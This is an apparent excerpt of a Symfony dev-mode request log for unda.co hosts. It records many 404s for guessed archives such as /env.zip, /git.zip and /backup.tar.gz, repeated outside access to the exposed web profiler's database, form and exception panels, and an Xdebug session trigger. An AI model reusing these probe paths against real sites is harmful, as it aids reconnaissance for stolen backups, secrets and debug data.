  3427. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /facebook-pixel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /facebook-pixel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3428. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /android.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /android.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3429. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /segment.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /segment.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3430. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /flutter.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /flutter.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3431. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /godot.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /godot.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3432. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /version1.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /version1.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3433. [2025-12-18 06:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /facebook.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /facebook.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3434. [2025-12-18 06:30:34] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3435. [2025-12-18 06:34:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d88c3a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d88c3a","method":"GET"} []
  3436. [2025-12-18 06:34:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3437. [2025-12-18 06:39:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d7d5e3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d7d5e3?panel=request","method":"GET"} []
  3438. [2025-12-18 06:39:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3439. [2025-12-18 06:42:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=form","method":"GET"} []
  3440. [2025-12-18 06:42:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  3441. [2025-12-18 06:46:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f00ae0","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/f00ae0/search/results?ip=35.95.104.113&limit=10&method=GET","method":"GET"} []
  3442. [2025-12-18 06:46:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=35.95.104.113&limit=10&method=GET","method":"GET"} []
  3443. [2025-12-18 06:47:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d0f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d0f32","method":"GET"} []
  3444. [2025-12-18 06:47:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3445. [2025-12-18 06:56:40] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  3446. [2025-12-18 06:58:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/latest?panel=form","method":"GET"} []
  3447. [2025-12-18 06:58:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  3448. [2025-12-18 06:59:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a2a520?group=1&panel=db","method":"GET"} []
  3449. [2025-12-18 06:59:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  3450. [2025-12-18 07:08:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"703e75","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/703e75?panel=twig","method":"GET"} []
  3451. [2025-12-18 07:08:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3452. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3453. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3454. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3455. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3456. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3457. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3458. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3459. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3460. [2025-12-18 07:09:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3461. [2025-12-18 07:09:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=162.243.172.59&limit=10","method":"GET"} []
  3462. [2025-12-18 07:09:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=162.243.172.59&limit=10","method":"GET"} []
  3463. [2025-12-18 07:17:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=exception","method":"GET"} []
  3464. [2025-12-18 07:17:30] request.INFO: Matched route "_profiler_exception_css". {"route":"_profiler_exception_css","route_parameters":{"_controller":"web_profiler.controller.exception:cssAction","token":"0397c8","_route":"_profiler_exception_css"},"request_uri":"https://www.unda.co/_profiler/0397c8/exception.css","method":"GET"} []
  3465. [2025-12-18 07:17:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  3466. [2025-12-18 07:17:30] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"0397c8","_route":"_profiler_exception"},"request_uri":"https://www.unda.co/_profiler/0397c8/exception","method":"GET"} []
  3467. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3468. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3469. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3470. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3471. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3472. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3473. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3474. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3475. [2025-12-18 07:19:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3476. [2025-12-18 07:25:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3477. [2025-12-18 07:26:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3478. [2025-12-18 07:28:41] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3479. [2025-12-18 07:30:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3480. [2025-12-18 07:30:34] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3481. [2025-12-18 07:36:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=router","method":"GET"} []
  3482. [2025-12-18 07:36:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  3483. [2025-12-18 07:37:36] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
  3484. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3485. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3486. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3487. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3488. [2025-12-18 07:39:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backups.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backups.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
